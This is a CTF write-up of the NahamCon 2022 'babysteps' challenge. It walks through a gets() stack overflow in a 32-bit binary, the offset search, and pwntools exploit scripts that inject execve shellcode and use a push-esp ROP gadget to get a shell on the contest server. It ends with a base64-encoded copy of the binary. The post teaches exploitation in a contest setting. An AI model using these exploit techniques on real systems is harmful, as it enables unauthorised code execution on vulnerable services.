Writeup for the easy ranked Nahamcon CTF challenge babysteps

Posted on Apr 30, 2022

Nahamcon

Yes we decided to take part in Nahamcon CTF. No we did not have the time to do it. No we could not help ourselves. :) The babysteps challenge was one of the easy ranked in the binary exploitation category. I choose to do a writeup on this cause I think it fits quite well as the next part in my series of posts about binary exploitation. This uses the good old shellcode on the stack trick and just barely scratches some return oriented programming. Let’s go and do some hacking.

Recon

First of all let’s read what the author John Hammond has to say about this challenge.

Babysteps

Well not that many clues there, perhaps “jump around” could be some kind of a clue. We do know this is supposed to be binary exploitation and we can see that we can download both the source code and the binary, and we got ourselves an address we can connect to with netcat. Let’s just start right away.

Scanning

We follow our regular methodology though there’s not much scanning to do since we already know the port we should connect to and so on. But there are some other analysis that needs to be done that’s part of the scanning process aswell.

Manually examining the service with netcat

Let’s try to connect to the target.

┌──(root㉿2db360616039)-[/]
└─# nc challenge.nahamcon.com 30317
              _)_
           .-'(/ '-.
          /    `    \
         /  -     -  \
        (`  a     a  `)
         \     ^     /
          '. '---' .'
          .-`'---'`-.
         /           \
        /  / '   ' \  \
      _/  /|       |\  \_
     `/|\` |+++++++|`/|\`
          /\       /\
          | `-._.-` |
          \   / \   /
          |_ |   | _|
          | _|   |_ |
          (ooO   Ooo)

=== BABY SIMULATOR 9000 ===
How's it going, babies!!
Are you ready for the adventure of a lifetime? (literally?)

First, what is your baby name?

We can connect and it presents us with some ascii and prompts for input. There is no point in digging around here since we have the source code and the binary. So let’s go on with some analysis of the source code.

Analysing the source code

#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>


#define BABYBUFFER 16

void setup(void) {
    setbuf(stdout, NULL);
    setbuf(stdin, NULL);
}

void whine() {
  puts("You whine: 'WAAAAAAHHHH!! WAAH, WAAHH, WAAAAAAHHHH'\n");
}

void scream() {
  puts("You scream: 'WAAAAAAHHHH!! WAAH, WAAHH, WAAAAAAHHHH'\n");
}

void cry() {
  puts("You cry: 'WAAAAAAHHHH!! WAAH, WAAHH, WAAAAAAHHHH'\n");
}

void sleep() {
  puts("Night night, baby!\n");
  exit(-1);
}


void ask_baby_name() {
  char buffer[BABYBUFFER];
  puts("First, what is your baby name?");
  return gets(buffer);
}

int main(int argc, char **argv){
  setup();

  puts("              _)_");
  puts("           .-'(/ '-.");
  puts("          /    `    \\");
  puts("         /  -     -  \\");
  puts("        (`  a     a  `)");
  puts("         \\     ^     /");
  puts("          '. '---' .'");
  puts("          .-`'---'`-.");
  puts("         /           \\");
  puts("        /  / '   ' \\  \\");
  puts("      _/  /|       |\\  \\_");
  puts("     `/|\\` |+++++++|`/|\\`");
  puts("          /\\       /\\");
  puts("          | `-._.-` |");
  puts("          \\   / \\   /");
  puts("          |_ |   | _|");
  puts("          | _|   |_ |");
  puts("          (ooO   Ooo)");
  puts("");

  puts("=== BABY SIMULATOR 9000 ===");

  puts("How's it going, babies!!");
  puts("Are you ready for the adventure of a lifetime? (literally?)");
  puts("");
  ask_baby_name();

  puts("Pefect! Now let's get to being a baby!\n");

  char menu_option;

  do{

    puts("CHOOSE A BABY ACTIVITY");
    puts("a. Whine");
    puts("b. Cry");
    puts("c. Scream");
    puts("d. Throw a temper tantrum");
    puts("e. Sleep.");
    scanf(" %c",&menu_option);

    switch(menu_option){

      case 'a':
        whine();
        break;
      case 'b':
        cry();
        break;
      case 'c':
        scream();
        break;
      case 'd':
        scream();
        cry();
        whine();
        cry();
        scream();
        break;
      case 'e':
        sleep();
        break;

      default:
        puts("WAAAAAAHHHH, THAT NO-NO!!!\n");
        break;
    }

  }while(menu_option !='e');

}

That’s a rather simple C program. We are looking for some place where we can input data and this immediatly caught my attention:

void ask_baby_name() {
  char buffer[BABYBUFFER];
  puts("First, what is your baby name?");
  return gets(buffer);
}

That call to gets() is a dangerous one since it has no bounds. We will be able to overflow that buffer if we fill it with more bytes than reserverd. And the size reserved is pretty limited:

#define BABYBUFFER 16

So we got ourselves a buffer overflow there. Time to check out the binary.

Analysing the binary

First of all let’s check out that binary using the file tool.

┌──(root㉿2db360616039)-[/]
└─# file babysteps 
babysteps: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=23b7b1945e8ce3847c586e16d9ccfb70fe7b6973, for GNU/Linux 3.2.0, not stripped

So it’s a 32-bit ELF binary. To get things right from the start I should probably spin up a 32-bit virtual Kali machine and try to execute the binary there. BUT…

┌──(kali㉿kali)-[~]
└─$ python3 -c 'import pwn;pwn.cyclic(32)'
[!] Pwntools does not support 32-bit Python.  Use a 64-bit release.

I like pwntools very much so I think I will try living of the land and do my exploit coding from a 64-bit machine anyway. Let’s try running the binary there.

┌──(kali㉿kali)-[~/Downloads]
└─$ chmod +x babysteps 
                             
┌──(kali㉿kali)-[~/Downloads]
└─$ ./babysteps 
              _)_
           .-'(/ '-.
          /    `    \
         /  -     -  \
        (`  a     a  `)
         \     ^     /
          '. '---' .'
          .-`'---'`-.
         /           \
        /  / '   ' \  \
      _/  /|       |\  \_
     `/|\` |+++++++|`/|\`
          /\       /\
          | `-._.-` |
          \   / \   /
          |_ |   | _|
          | _|   |_ |
          (ooO   Ooo)

=== BABY SIMULATOR 9000 ===
How's it going, babies!!
Are you ready for the adventure of a lifetime? (literally?)

First, what is your baby name?

That looks pretty much the same as the remote service we connected to with netcat. Good. Let’s try to smash that buffer with a 32 characters long name.

First, what is your baby name?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
zsh: segmentation fault  ./babysteps

All fine. What I figured out theoretically seems to work in reality aswell. Let’s see what kind of countermeasures we are up against.

┌──(root㉿2db360616039)-[/]
└─# checksec babysteps 
[*] '/babysteps'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

Almost nothing is enabled, we should be able to do all kind of fun things with this. The code is loaded at a static address. There’s no canary on the stack and we can even execute code on the stack. We should be able to hijack $eip pretty easy. Let’s find out that offset on the stack so we know exactly where to hijack $eip.

┌──(kali㉿kali)-[~/Downloads]
└─$ python3 -c 'import pwn;print(pwn.cyclic(32))'
b'aaaabaaacaaadaaaeaaafaaagaaahaaa'

We got ourselves a cyclic pattern aaaabaaacaaadaaaeaaafaaagaaahaaa. Let’s start the program in gdb and give the pattern as our name.

┌──(kali㉿kali)-[~/Downloads]
└─$ gdb babysteps 
GNU gdb (Debian 10.1-2+b1) 10.1.90.20210103-git
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from babysteps...
(No debugging symbols found in babysteps)
(gdb) r
Starting program: /home/kali/Downloads/babysteps 
              _)_
           .-'(/ '-.
          /    `    \
         /  -     -  \
        (`  a     a  `)
         \     ^     /
          '. '---' .'
          .-`'---'`-.
         /           \
        /  / '   ' \  \
      _/  /|       |\  \_
     `/|\` |+++++++|`/|\`
          /\       /\
          | `-._.-` |
          \   / \   /
          |_ |   | _|
          | _|   |_ |
          (ooO   Ooo)

=== BABY SIMULATOR 9000 ===
How's it going, babies!!
Are you ready for the adventure of a lifetime? (literally?)

First, what is your baby name?
aaaabaaacaaadaaaeaaafaaagaaahaaa

Program received signal SIGSEGV, Segmentation fault.
0x61616168 in ?? ()

It seems our $eip now holds the address 0x61616168 this means that’s the point in our pattern that was read from the stack into $eip upon a ret instruction. Now we can calculate the offset.

┌──(kali㉿kali)-[~/Downloads]
└─$ python3 -c 'import pwn;print(pwn.cyclic_find(0x61616168))'
28

So the offset is 28. It’s about time we get started to write some exploit code and gain some access.

Gaining Access

Developing the exploit code

So it’s 32-bit and we are able to execute code of the stack. Time for some good old shellcode. But the days of handcrafting or googling some good shellcode is more or less over. Let’s use pwntools for almost everything. First of all some shellcode.

from pwn import *

context.binary = 'babysteps'

shellcode = shellcraft.sh()

print(shellcode)

If we execute that python script we get ourselves som assembly shell code.

    /* execve(path='/bin///sh', argv=['sh'], envp=0) */
    /* push b'/bin///sh\x00' */
    push 0x68
    push 0x732f2f2f
    push 0x6e69622f
    mov ebx, esp
    /* push argument array ['sh\x00'] */
    /* push 'sh\x00\x00' */
    push 0x1010101
    xor dword ptr [esp], 0x1016972
    xor ecx, ecx
    push ecx /* null terminate */
    push 4
    pop ecx
    add ecx, esp
    push ecx /* 'sh\x00' */
    mov ecx, esp
    xor edx, edx
    /* call execve() */
    push SYS_execve /* 0xb */
    pop eax
    int 0x80

That should probably do the trick. Just to try this out we disable ASLR temporarly.

┌──(kali㉿kali)-[~/Downloads]
└─$ sudo echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

0

We can now design our exploit code so it looks like this.

from pwn import *

context.binary = 'babysteps'

shellcode = asm(shellcraft.sh())
address =  p32(0xffffffff)
nopsled = asm('nop')*32
payload = cyclic(28) + address + nopsled + shellcode

p = process('./babysteps')
gdb.attach(p)
p.recvuntil(b'name?\n')
p.sendline(payload)
p.interactive()

The payload is a cyclic pattern of length 28 as we calculated before. I set address to 0xfffffff so $eip should pop this and crash. Theb we should be able to find out the true address of the stack using gdb. First of all run the exploit.

┌──(kali㉿kali)-[~/Downloads]
└─$ python3 exploit.py
[*] '/home/kali/Downloads/babysteps'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[+] Starting local process './babysteps': pid 17380
[*] running in new terminal: ['/usr/bin/gdb', '-q', './babysteps', '17380']
[+] Waiting for debugger: Done
[*] Switching to interactive mode
$  

It opens up another window with GDB attached and we should be able to find out where the stack is located at the time of the crash.

Reading symbols from ./babysteps...
(No debugging symbols found in ./babysteps)
Attaching to program: /home/kali/Downloads/babysteps, process 17380
Reading symbols from /lib32/libc.so.6...
(No debugging symbols found in /lib32/libc.so.6)
Reading symbols from /lib/ld-linux.so.2...
(No debugging symbols found in /lib/ld-linux.so.2)
0xf7fc9559 in __kernel_vsyscall ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xffffffff in ?? ()
(gdb) info registers
eax            0xffffd120          -12000
ecx            0xf7fa8580          -134576768
edx            0xfbad208b          -72540021
ebx            0x61616166          1633771878
esp            0xffffd140          0xffffd140
ebp            0x61616167          0x61616167
esi            0x1                 1
edi            0x8049090           134516880
eip            0xffffffff          0xffffffff
eflags         0x10282             [ SF IF RF ]
cs             0x23                35
ss             0x2b                43
ds             0x2b                43
es             0x2b                43
fs             0x0                 0
gs             0x63                99

It seems that $esp is pointing at 0xffffd140 at the time of the crash. Which means that if we just add a nopsled of 32 (just an old habit) we could jump to 0xffffd140 + 16 and we should hit the nopsled and slide into our shellcode. Let’s tidy up our code and skip GDB.

from pwn import *

context.binary = 'babysteps'

shellcode = asm(shellcraft.sh())
address =  p32(0xffffd140 + 16)
nopsled = asm('nop') * 32
payload = cyclic(28) + address + nopsled + shellcode

p = process('./babysteps')
p.recvuntil(b'name?\n')
p.sendline(payload)
p.interactive()

Time to spawn a shell (hopefully…)

┌──(kali㉿kali)-[~/Downloads]
└─$ python3 exploit.py
[*] '/home/kali/Downloads/babysteps'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[+] Starting local process './babysteps': pid 18625
[*] Switching to interactive mode
$ ls
babysteps  core  exploit.py

BOOM!!! We got a shell. But now comes the big question, is ASLR enabled on the target??? After some thinking I realised that even if it’s not I have no clue what Linux distro they are running and I have no other details about the environment. That makes it pretty hard for us to guess the address on the stack. So let’s just assume ASLR is enabled and we need to use some return oriented programming to call the shellcode.

Finding a suitable gadget for ROP

So I decided to look for a gadget inside the main binary. Something where $esp is pushed to the stack should do it. We will use ROPGadget to find a suitable address.

┌──(kali㉿kali)-[~/Downloads]
└─$ ROPgadget --binary babysteps | grep "push esp"
0x080490c1 : push esp ; mov ebx, dword ptr [esp] ; ret

There is only one, but it pretty much looks like what we are after. We push the address of the stack onto the stack and in the end we do a ret so it is popped again into $eip and it should point at our shellcode. That mov ebx, dword ptr [esp] stuff just affects the $ebx register and it should not interfere with what we are doing so lets change the exploit code to use our gadget at x080490c1.

from pwn import *

context.binary = 'babysteps'

shellcode = asm(shellcraft.sh())
gadget =  p32(0x080490c1)
payload = cyclic(28) + gadget + shellcode

p = process('./babysteps')
p.recvuntil(b'name?\n')
p.sendline(payload)
p.interactive()

And now I enable ASLR again and try our new exploit code.

┌──(kali㉿kali)-[~/Downloads]
└─$ echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
[sudo] password for kali: 
2
                                           
┌──(kali㉿kali)-[~/Downloads]
└─$ python3 exploit.py                                   
[*] '/home/kali/Downloads/babysteps'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[+] Starting local process './babysteps': pid 21425
[*] Switching to interactive mode
$ ls
babysteps  core  exploit.py  

And once again we have a shell, this time we should be good to go against our real target since we so not need to know the address of the stack anymore.

Exploitation

This is our final exploit code. We change the local process to connect remote to the target instead.

from pwn import *

context.binary = 'babysteps'

shellcode = asm(shellcraft.sh())
gadget =  p32(0x080490c1)
payload = cyclic(28) + gadget + shellcode

p = remote('challenge.nahamcon.com', 30317)
p.recvuntil(b'name?\n')
p.sendline(payload)
p.interactive()

And now the time has come to Pwn…

Christian

Summary

First of all I like to give a big thank you to all of the NahamCon 2022 CTF crew! @NahamSec @_JohnHammond @STOKFredrik @kkevsterrr @Congon4tor @calebjstewart @M_alphaaa @birchb0y , and all others involved!

This CTF has a huge amount of challenges ranging from easy to hard and in many categories like web, forensics, binary exploitation, reverse engineering and so on. It’s just too many to even look at everything in 48 hours. At least if your team is 2-3 people with limited time on a friday-saturday competition. But we are really happy with the result.

Babysteps

Being within the top 3% in a competition this size and with many elite CTF-teams participating is good. And I have to say that we really enjoed that OSINT challenge with the Keeber Security Group. Really fun even though I gave up when I could not crack that keepass database for a few hours. :) I hope to see more OSINT in CTF:s in the future.

Until next time, happy hacking!

/f1rstr3am

Christian

HTB THM

I leave you with a base64 encoded gzipped verison of the babysteps binary if you would like to play with it.

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